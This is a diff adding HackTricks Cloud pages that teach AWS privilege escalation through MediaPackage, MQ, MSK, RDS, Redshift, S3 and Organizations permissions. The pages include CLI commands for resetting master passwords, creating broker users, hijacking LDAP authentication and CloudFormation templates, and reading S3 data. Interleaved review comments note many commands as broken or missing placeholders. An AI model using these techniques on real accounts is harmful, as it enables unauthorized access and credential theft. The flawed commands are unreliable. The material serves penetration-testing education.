+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md new file mode 100644 index 0000000000..3156ba72e3 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md @@ -0,0 +1,53 @@ +# AWS - Mediapackage Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### `mediapackage:RotateChannelCredentials` + +Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) + +```bash +aws mediapackage rotate-channel-credentials --id +``` + +### `mediapackage:RotateIngestEndpointCredentials` + +Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) + +{% code overflow="wrap" %} +```bash +aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 +``` +{% endcode %} + +## References + +* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md new file mode 100644 index 0000000000..3532b180a4 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md @@ -0,0 +1,79 @@ +# AWS - MQ Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## MQ + +For more information about MQ check: + +{% content-ref url="../aws-services/aws-mq-enum.md" %} +[aws-mq-enum.md](../aws-services/aws-mq-enum.md) +{% endcontent-ref %} + +### `mq:ListBrokers`, `mq:CreateUser` + +With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): + +{% code overflow="wrap" %} +```bash +aws mq list-brokers +aws mq create-user --broker-id --console-access --password --username +``` +{% endcode %} + +**Potential Impact:** Access sensitive info navigating through ActiveMQ + +### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` + +With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): + +{% code overflow="wrap" %} +```bash +aws mq list-brokers +aws mq list-users --broker-id +aws mq update-user --broker-id --console-access --password --username +``` +{% endcode %} + +**Potential Impact:** Access sensitive info navigating through ActiveMQ + +### `mq:ListBrokers`, `mq:UpdateBroker` + +If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. + +```bash +aws mq list-brokers +aws mq update-broker --broker-id --ldap-server-metadata=... +``` + +If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). + +**Potential Impact:** Steal ActiveMQ credentials + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md new file mode 100644 index 0000000000..c5a09cb298 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md @@ -0,0 +1,52 @@ +# AWS - MSK Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## MSK + +For more information about MSK (Kafka) check: + +{% content-ref url="../aws-services/aws-msk-enum.md" %} +[aws-msk-enum.md](../aws-services/aws-msk-enum.md) +{% endcontent-ref %} + +### `msk:ListClusters`, `msk:UpdateSecurity` + +With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. + +{% code overflow="wrap" %} +```bash +aws msk --client-authentication --cluster-arn --current-version +``` +{% endcode %} + +You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ +If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
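Review bot: the CLI example `aws msk --client-authentication --cluster-arn --current-version` is missing its subcommand and uses a service name the AWS CLI does not have; MSK is driven through `aws kafka`, so the line should be `aws kafka update-security --cluster-arn <cluster-arn> --current-version <version> --client-authentication <json>`. The heading has the same problem: the IAM service prefix for MSK is `kafka`, so the permissions are `kafka:ListClusters` and `kafka:UpdateSecurity`, not `msk:*`; a reader copying `msk:UpdateSecurity` into a policy or a log search would find nothing. "None authentication" also does not match the API, where the setting is the `Unauthenticated` member of `ClientAuthentication`; naming it correctly tells a defender exactly which field to alert on. Finally, "If it's publicly exposed, if SASL/SCRAM authentication is used, you could read the secret..." stacks two conditionals in one sentence; split it into one sentence per case (SASL/SCRAM: needs read access to the Secrets Manager secret; IAM: needs the ability to change the IAM policy).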
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md new file mode 100644 index 0000000000..89b2282f25 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md @@ -0,0 +1,44 @@ +# AWS - Organizations Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Organizations + +For more information check: + +{% content-ref url="../aws-services/aws-organizations-enum.md" %} +[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) +{% endcontent-ref %} + +## From management Account to children accounts + +If you compromise the root/management account, chances are you can compromise all the children accounts.\ +To [**learn how check this page**](../#compromising-the-organization). + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
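Review bot: the heading "From management Account to children accounts" has inconsistent capitalisation and should read "From the management account to child accounts". The paragraph under it states a conclusion ("chances are you can compromise all the children accounts") and then only points at `../#compromising-the-organization`; a one-sentence summary of the mechanism the linked section describes would let this page stand on its own and would also tell a defender what control (which role or trust relationship in the member accounts) to review.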
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md new file mode 100644 index 0000000000..081a745749 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md @@ -0,0 +1,206 @@ +# AWS - RDS Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## RDS - Relational Database Service + +For more information about RDS check: + +{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} +[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) +{% endcontent-ref %} + +### `rds:ModifyDBInstance` + +With that permission an attacker can **modify the password of the master user**, and the login inside the database: + +```bash +# Get the DB username, db name and address +aws rds describe-db-instances + +# Modify the password and wait a couple of minutes +aws rds modify-db-instance \ + --db-instance-identifier \ + --master-user-password 'Llaody2f6.123' \ + --apply-immediately + +# In case of postgres +psql postgresql://:@:5432/ +``` + +{% hint style="warning" %} +You will need to be able to **contact to the database** (they are usually only accessible from inside networks). +{% endhint %} + +**Potential Impact:** Find sensitive info inside the databases. + +### rds-db:connect + +According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) a user with this permission could connect to the DB instance. + +### Abuse RDS Role IAM permissions + +#### Postgresql (Aurora) + +{% hint style="success" %} +If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. +{% endhint %} + +First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions: + +```sql +SELECT * FROM pg_extension; +``` + +If you find something like **`aws_s3`** you can assume this database has **some kind of access over S3** (there are other extensions such as **`aws_ml`** and **`aws_lambda`**). + +Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see there if the **cluster has any IAM Role attached** in the field **`AssociatedRoles`**. 
If any, you can assume that the database was **prepared to access other AWS services**. Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has. + +Now, to **read a file inside a bucket** you need to know the full path. You can read it with: + +```sql +// Create table +CREATE TABLE ttemp (col TEXT); + +// Create s3 uri +SELECT aws_commons.create_s3_uri( + 'test1234567890678', // Name of the bucket + 'data.csv', // Name of the file + 'eu-west-1' //region of the bucket +) AS s3_uri \gset + +// Load file contents in table +SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri'); + +// Get info +SELECT * from ttemp; + +// Delete table +DROP TABLE ttemp; +``` + +If you had **raw AWS credentials** you could also use them to access S3 data with: + +```sql +SELECT aws_s3.table_import_from_s3( + 't', '', '(format csv)', + :'s3_uri', + aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') +); +``` + +{% hint style="info" %} +Postgresql **doesn't need to change any parameter group variable** to be able to access S3. +{% endhint %} + +#### Mysql (Aurora) + +{% hint style="success" %} +Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**. +{% endhint %} + +Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data. + +Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which usually means access to AWS services). + +Now, to **read a file inside a bucket** you need to know the full path. 
You can read it with: + +```sql +CREATE TABLE ttemp (col TEXT); +LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col); +SELECT * FROM ttemp; +DROP TABLE ttemp; +``` + +### `rds:AddRoleToDBCluster`, `iam:PassRole` + +An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. + +```bash +aws add-role-to-db-cluster --db-cluster-identifier --role-arn +``` + +**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.\ +Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also. + +### `rds:CreateDBInstance` + +Just with this permission an attacker could create a **new instance inside a cluster** that already exists and has an **IAM role** attached. He won't be able to change the master user password, but he might be able to expose the new database instance to the internet: + +```bash +aws --region eu-west-1 --profile none-priv rds create-db-instance \ + --db-instance-identifier mydbinstance2 \ + --db-instance-class db.t3.medium \ + --engine aurora-postgresql \ + --db-cluster-identifier database-1 \ + --db-security-groups "string" \ + --publicly-accessible +``` + +### `rds:CreateDBInstance`, `iam:PassRole` + +{% hint style="info" %} +TODO: Test +{% endhint %} + +An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance. + +{% hint style="warning" %} +Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): + +* The profile must exist in your account. 
+* The profile must have an IAM role that Amazon EC2 has permissions to assume. +* The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` . +{% endhint %} + +{% code overflow="wrap" %} +```bash +aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole +``` +{% endcode %} + +**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. + +### `rds:AddRoleToDBInstance`, `iam:PassRole` + +An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. + +{% hint style="warning" %} +The DB instance must be outside of a cluster for this +{% endhint %} + +{% code overflow="wrap" %} +```bash +aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name +``` +{% endcode %} + +**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
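Review bot: the `rds:AddRoleToDBCluster` example `aws add-role-to-db-cluster --db-cluster-identifier --role-arn` is missing the `rds` service word and should be `aws rds add-role-to-db-cluster --db-cluster-identifier <cluster> --role-arn <role-arn>`. In the Postgres (Aurora) block the comments use `//`, which neither psql nor PostgreSQL accept; change them to `--` (the `\gset` meta-command itself is fine in psql). The `rds:CreateDBInstance`, `iam:PassRole` example has `--vapc-security-group-ids`, which should be `--vpc-security-group-ids`, and it passes `--custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole` with `--engine mysql`, which contradicts the hint just above it: that option belongs to RDS Custom engines, takes an instance profile name, and the hint itself says the name must start with `AWSRDSCustom`; since the section is already marked "TODO: Test", either drop the flag or make the example consistent with the stated requirements. In the `rds:AddRoleToDBInstance` line the value after `--feature-name` is missing (the flag takes a feature such as `s3Import`), and the other commands have lost their placeholders too (`--db-instance-identifier`, `psql postgresql://:@:5432/`). Minor: "aprameter groups" should be "parameter groups", and "which usually means access to AWS services)." has a stray closing parenthesis. One caveat worth adding to the `rds:ModifyDBInstance` section: resetting the master password invalidates the credential every legitimate client is using, so the technique is both disruptive and easy to notice.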
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md new file mode 100644 index 0000000000..e5098c2443 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md @@ -0,0 +1,135 @@ +# AWS - Redshift Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Redshift + +For more information about RDS check: + +{% content-ref url="../aws-services/aws-redshift-enum.md" %} +[aws-redshift-enum.md](../aws-services/aws-redshift-enum.md) +{% endcontent-ref %} + +### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` + +With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: + +```bash +# Get creds +aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 +# Connect, even if the password is a base64 string, that is the password +psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 +``` + +**Potential Impact:** Find sensitive info inside the databases. + +### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` + +With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ +Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. + +```bash +# Get creds +aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 +# Connect, even if the password is a base64 string, that is the password +psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 +``` + +**Potential Impact:** Find sensitive info inside the databases. + +### `redshift:DescribeClusters`, `redshift:ModifyCluster?` + +It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): + +``` +aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; +``` + +**Potential Impact:** Find sensitive info inside the databases. 
+ +## Accessing External Services + +{% hint style="warning" %} +To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. + +Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` +{% endhint %} + +### Lambdas + +As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r\_CREATE\_EXTERNAL\_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: + +```sql +CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) +RETURNS INT +STABLE +LAMBDA 'lambda_function' +IAM_ROLE default; +``` + +### S3 + +As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: + +```sql +# Read +copy table from 's3:///load/key_prefix' +credentials 'aws_iam_role=arn:aws:iam:::role/' +region '' +options; + +# Write +unload ('select * from venue') +to 's3://mybucket/tickit/unload/venue_' +iam_role default; +``` + +### Dynamo + +As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t\_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: + +```sql +copy favoritemovies +from 'dynamodb://ProductCatalog' +iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; +``` + +{% hint style="warning" %} +The 
Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. +{% endhint %} + +### EMR + +Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) + +## References + +* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
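Review bot: the intro line "For more information about RDS check:" was copied from the RDS page and should say Redshift. The `modify-cluster` example `aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’;` uses en-dashes instead of `--`, typographic quotes instead of `'`, a trailing `;`, and no cluster identifier, so it cannot be pasted as written; the action it exercises is `redshift:ModifyCluster`, so the `?` in the heading could be replaced by the untested-hint style used elsewhere in this PR. In the S3 block the `# Read` / `# Write` comments are not valid Redshift SQL comments; use `--`. "redshit" should be "redshift", and the copy/psql examples have lost their placeholders (`-U "IAM:"`, `'s3:///load/key_prefix'`, `arn:aws:iam:::role/`, `region ''`). The role-chaining note (`iam_role 'arn...RoleA,arn...RoleB'`) is a useful detail for defenders as well: the second role's trust policy is what allows the chain, so it deserves a sentence saying that restricting which principals can assume RoleB is the control.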
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md new file mode 100644 index 0000000000..8850b9b144 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md @@ -0,0 +1,206 @@ +# AWS - S3 Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## S3 + +### `s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject` + +An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges. + +For example, an attacker with those **permissions over a cloudformation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy: + +```json +{ + "Version":"2012-10-17", + "Statement":[ + { + "Effect":"Allow", + "Action":[ + "s3:PutBucketNotification", + "s3:GetBucketNotification", + "s3:PutObject", + "s3:GetObject"], + "Resource":[ + "arn:aws:s3:::cf-templates-*\/*", + "arn:aws:s3:::cf-templates-*"] + }, + { + "Effect":"Allow", + "Action":"s3:ListAllMyBuckets", + "Resource":"*" + }] + } +``` + +And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**. + +![](<../../../.gitbook/assets/image (174).png>) + +The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\ +For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) + +### `s3:PutObject`, `s3:GetObject` + +These are the permissions to **get and upload objects to S3**. 
